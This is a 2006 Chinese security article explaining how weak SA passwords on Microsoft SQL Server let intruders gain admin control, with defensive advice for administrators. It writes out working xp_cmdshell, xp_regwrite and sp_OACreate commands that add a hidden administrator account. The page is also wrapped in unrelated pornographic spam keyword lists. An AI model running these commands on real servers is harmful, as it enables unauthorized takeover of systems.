国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

SA弱口令帶來的安全隱患
2006-03-27   http://www.51cto.com

存在Microsoft SQL Server SA弱口令漏洞的計算機一直是網絡攻擊者青睞的對象之一,通過這個漏洞,可以輕易的得到服務器的管理權限,從而威脅網絡及數據的安全。作為網絡管理員,我們可不能不聞不問,一定要弄清楚這其中的起因、經過和結果,才能有的放矢,做到更為有效的防范,下面我就詳細的向大家介紹一下。

Microsoft SQLServer是一個c/s模式的強大的關系型數據庫管理系統,應用領域十分廣泛,從網站后臺數據庫到一些MIS(管理信息系統)到處都可以看到它的身影。網絡中利用Microsoft SQLServer SA弱口令入侵的核心內容就是利用Microsoft SQLServer中的存儲過程獲得系統管理員權限,那到底什么是存儲過程?

存儲過程是存儲在SQLServer中的預先寫好的SQL語句集合,其中危險性最高的擴展存儲過程就是xp_cmdshell了,它可以執行操作系統的任何指令,而SA是Microsoft SQLServer的管理員帳號,擁有最高權限,它可以執行擴展存儲過程,并獲得返回值,比如執行:exec master..xp_cmdshell 'net user test 1234 /add'和exec master..xp_cmdshell 'net localgroup administrators test /add'這樣對方的系統就被添加了一個用戶名為test,密碼為1234,有管理員權限的用戶,如圖一所示。

""

圖一(點擊看原圖

現在你應該明白為什么得到SA密碼,就可以得到系統的最高權限了吧。而往往不少網絡管理員不清楚這個情況,為自己的SA用戶起了一些諸如1234,4321等簡單的密碼,甚至根本就不設置密碼,這樣網絡入侵者就可以利用一些黑客工具很輕松的掃描到SA的密碼,進而控制計算機。

除了xp_cmdshell,還有一些存儲過程也有可能會被入侵者利用到:

1、xp_regread(這個擴展存儲過程可以讀取注冊表指定的鍵里指定的值),使用方法(得到機器名):

DECLARE @test varchar(50)

EXEC master..xp_regread @rootkey='HKEY_LOCAL_MACHINE',

@key='systemcontrolset001controlcomputernamecomputername',

@value_name='computername',

@value=@test OUTPUT

SELECT @test

2、xp_regwrite(這個擴展存儲過程可以寫入注冊表指定的鍵里指定的值),使用方法(在鍵HKEY_LOCAL_MACHINESOFTWAREaaaaaaValue寫入bbb):

EXEC master..xp_regwrite

@rootkey='HKEY_LOCAL_MACHINE',

@key='SOFTWAREaaa',

@value_name='aaaValue',

@type='REG_SZ',

@value='bbb'

如果被入侵的計算機的administrator用戶可以瀏覽注冊表中的HKEY_LOCAL_MACHINESAMSAM信息,那使用xp_regread、xp_regwrite這兩個存儲過程可以實現克隆administrator用戶,得到管理員權限。xp_regdeletekey、xp_regdeletevalue也會對系統帶來安全隱患。

3、OLE相關的一系列存儲過程,這系列的存儲過程有sp_OACreate,sp_OADestroy,sp_OAGetErrorInfo,sp_OAGetProperty,sp_OAMethod,sp_OASetProperty,sp_OAStop,使用方法:

DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',

@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,

'c:WINNTsystem32cmd.exe /c net user test 1234 /add'--

這樣對方系統增加了一個用戶名為test,密碼為1234的用戶,再執行:

DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',

@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,

'c:WINNTsystem32cmd.exe

/c net localgroup administrators test /add '--

用戶test,被加入管理員組。

解決辦法:給SA起個足夠復雜的密碼,使網絡攻擊者很難破解出來。為了保險,我們還要到在SQLServer的查詢分析器中使用存儲過程sp_dropextendedproc刪除xp_cmdshell等存儲過程,需要時再使用sp_addextendedproc恢復即可,具體操作可以在SQLServer中查詢sp_dropextendedproc和sp_addextendedproc的使用幫助,需要注意一點的是刪除OLE相關系列的存儲過程,可能會造成企業管理器中的某些功能無法使用,這里筆者不建議刪除。

既然我們知道了SP_OACREATE的使用方法,那我們就可以到WINNTsystem32下找到cmd.exe,net.exe和net1.exe這三個文件,在“屬性”—“安全”中把可以對他們訪問的用戶全部刪除掉,這樣就無法使用SP_OACREATE來增加系統用戶了,在我們需要訪問這些文件的時候再加上訪問用戶就可以了。

熱詞搜索:

上一篇:一盤在手 救災無憂
下一篇:黑客工具展覽會:DoS攻擊軟件連連看

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
精品黑人一区二区三区久久 | 成人国产亚洲欧美成人综合网| 亚洲一区二区三区四区在线观看| 国产精品传媒在线| 欧美国产精品v| 亚洲天堂网中文字| 亚洲精品中文在线| 一区av在线播放| 亚洲3atv精品一区二区三区| 亚洲欧美色一区| 首页综合国产亚洲丝袜| 久久精品国产一区二区三区免费看| 日本女人一区二区三区| 激情久久久久久久久久久久久久久久| 美女视频黄久久| 国产精品综合av一区二区国产馆| 成人听书哪个软件好| 91亚洲国产成人精品一区二三| 欧美日韩一卡二卡三卡 | 国产日产欧美精品一区二区三区| 国产午夜精品在线观看| 亚洲欧美综合色| 性感美女极品91精品| 久久国产精品99久久久久久老狼| 国产成人在线视频免费播放| 91免费版pro下载短视频| 欧美三级三级三级爽爽爽| 日韩美女在线视频 | 91福利在线看| 日韩亚洲电影在线| 国产精品大尺度| 日韩电影在线一区二区| 国产成人一区二区精品非洲| 在线精品视频一区二区| 欧美国产精品劲爆| 337p日本欧洲亚洲大胆精品| 国产日韩亚洲欧美综合| 一区二区三区.www| 免费成人你懂的| 99久久久国产精品免费蜜臀| 678五月天丁香亚洲综合网| 亚洲国产精品av| 日韩高清欧美激情| 一本大道久久精品懂色aⅴ| 成人一区在线看| 在线免费观看日本欧美| 久久九九久久九九| 日韩精品每日更新| 91免费看片在线观看| 久久久久久亚洲综合影院红桃 | 在线视频综合导航| 国产欧美日韩中文久久| 日韩电影免费在线看| 91官网在线免费观看| 日本一区二区三区国色天香 | 欧美一区二区视频观看视频| 亚洲六月丁香色婷婷综合久久| 国产成人综合在线观看| 日韩精品一区二区三区三区免费 | 国产福利一区二区三区| 欧美一三区三区四区免费在线看| 亚洲欧美综合在线精品| 成人av网站在线观看| 久久综合久久99| 激情文学综合插| 精品少妇一区二区三区日产乱码 | 欧美日韩在线播放三区| 亚洲欧美日韩人成在线播放| 99久久精品免费看| 国产精品激情偷乱一区二区∴| 国产麻豆视频一区二区| 精品久久久久99| 久久国产生活片100| 欧美一区二区三区精品| 日本视频免费一区| 日韩欧美电影一区| 国产真实乱对白精彩久久| 精品国产一区二区国模嫣然| 美女网站色91| 精品sm在线观看| 国产91综合网| 18涩涩午夜精品.www| 99久久亚洲一区二区三区青草| 亚洲裸体xxx| 欧美亚洲一区二区在线观看| 亚洲成人资源在线| 欧美一二三区在线观看| 国内不卡的二区三区中文字幕| 久久日一线二线三线suv| 国产一区二区在线看| 国产精品全国免费观看高清| 91在线观看下载| 亚洲国产精品自拍| 日韩欧美激情四射| 国产99久久久国产精品免费看| 亚洲欧美日韩一区二区三区在线观看| 欧美亚洲一区二区三区四区| 久久99精品久久久久婷婷| 国产欧美精品一区| 色哟哟在线观看一区二区三区| 亚洲专区一二三| 精品国产一区二区三区忘忧草| av电影天堂一区二区在线| 亚洲影视在线观看| 亚洲精品一区二区三区蜜桃下载 | 9i在线看片成人免费| 亚洲综合一区二区精品导航| 日韩欧美成人激情| zzijzzij亚洲日本少妇熟睡| 亚瑟在线精品视频| 国产精品系列在线| 正在播放一区二区| 99在线视频精品| 免费一级欧美片在线观看| 国产精品久久久久久久裸模 | 激情国产一区二区| 一区二区三区在线不卡| 欧美精品一区在线观看| 欧美影院精品一区| 成人av网在线| 久久精品国产亚洲一区二区三区 | 精品欧美一区二区在线观看| 在线视频你懂得一区| 国产精品一区二区三区99| 亚洲国产精品久久艾草纯爱 | 91福利国产精品| 激情偷乱视频一区二区三区| 午夜精品久久久久久久久| 国产精品国产三级国产三级人妇 | 欧美日韩国产精品成人| 懂色av中文一区二区三区| 奇米888四色在线精品| 亚洲黄网站在线观看| 国产精品免费视频网站| 久久久噜噜噜久久人人看| 日韩一区国产二区欧美三区| 欧美日韩另类一区| 在线观看日产精品| 99久久777色| 成人黄色片在线观看| 国产综合色在线视频区| 久久国产视频网| 久久精品国产网站| 麻豆成人91精品二区三区| 蜜桃av一区二区在线观看| 午夜久久福利影院| 亚洲福利视频一区| 性感美女久久精品| 天天综合天天综合色| 亚洲高清一区二区三区| 亚洲综合免费观看高清完整版 | 中文字幕+乱码+中文字幕一区| 久久夜色精品国产欧美乱极品| 日韩欧美激情在线| 亚洲精品在线三区| 国产视频一区二区在线观看| 国产欧美精品一区二区三区四区| 久久久久九九视频| 中文字幕欧美国产| 国产精品二区一区二区aⅴ污介绍| 国产精品美女一区二区| 精品日韩欧美一区二区| 亚洲视频一区二区免费在线观看| 欧美成人a在线| 欧美精品一区二区高清在线观看 | 欧美高清www午色夜在线视频| 欧美日韩亚洲综合在线 欧美亚洲特黄一级 | 伦理电影国产精品| 韩国午夜理伦三级不卡影院| 国产网红主播福利一区二区| 不卡视频免费播放| 成人教育av在线| 99精品欧美一区二区三区小说| 色域天天综合网| 欧美丰满少妇xxxbbb| 久久久久久亚洲综合影院红桃| 国产精品视频在线看| 亚洲乱码国产乱码精品精98午夜 | 极品美女销魂一区二区三区| 国产成人8x视频一区二区 | 国产高清不卡二三区| 成人av电影在线观看| 欧美亚洲日本国产| 欧美成人女星排名| 国产精品入口麻豆九色| 调教+趴+乳夹+国产+精品| 国产高清亚洲一区| 欧美体内she精视频| 国产三级精品三级在线专区| 亚洲欧美日韩精品久久久久| 蜜桃在线一区二区三区| 99精品国产91久久久久久| 欧美一区二区免费视频| 亚洲国产经典视频| 青草国产精品久久久久久| 91蜜桃婷婷狠狠久久综合9色| 欧美一级理论性理论a| 亚洲女人小视频在线观看| 韩国精品在线观看| 欧美高清一级片在线|